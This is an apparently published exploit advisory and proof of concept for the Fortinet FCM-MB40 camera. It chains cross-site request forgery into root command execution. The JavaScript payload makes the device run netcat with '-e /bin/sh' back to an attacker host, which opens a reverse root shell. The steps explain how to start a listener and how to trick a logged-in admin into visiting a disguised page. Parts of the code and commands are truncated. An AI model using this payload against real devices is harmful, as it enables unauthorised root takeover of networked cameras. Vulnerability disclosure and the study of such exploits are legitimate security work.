Fortinet FCM-MB40 Cross Site Request Forgery / Remote Command Execution

Fortinet FCM-MB40 suffers from remote command execution and cross site request forgery vulnerabilities.

MD5 | e2212fb8aa1889c54380a3225d5c91a7

# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF
# Date: 2019-06-19
# Exploit Author: @XORcat
# Vendor Homepage:
# Software Link: Customer Account Required
# Version: v1.2.0.0
# Tested on: Linux

<!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat)

Full details:

Follow the following steps to demonstrate this PoC:

1. Replace IP addresses in Javascript code to repr esent your testing
2. Launch a `netcat` listener on the attacker's host using `nc -nvlp
3. Ensure the "admin" user's browser is logged in to the FCM-MB40.
* Note: all modern browsers will cache Basic Authentication
credentials (such as those used by the FCM-MB40) even if the
FCM-MB40's administration page is closed.
4. Open the crafted HTML document using the "admin" user's
* Note: In an attack scenario, this step would be performed by
implanting the code into a legitimate webpage that the "admin"
user visits, or by tricking the "admin" user into opening a page
which includes the code.
5. Note that the `netcat` listener established in step 2. has received
a connection from the camera, and that it is presenting a `/bin/sh`
session as root.
* Note: type `id` in the `netcat` connection to verify this.

_Note: After this issue has been exploited, the state of the system will
have changed, and future exploitation attempts may require
const sleep = (milliseconds) => {
return new Promise(resolve => setTimeout(resolve, milliseconds))
var sed_url = '^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';
var execute_url = '';

var sed_img = document.createElement("img");
sed_img.src = sed_url;

sleep(400).then(() => {
var execute_img = document.createElement("img");
execute_img.src = execute_url;
<h1>Welcome to my non-malicious website.</h1>

Related Posts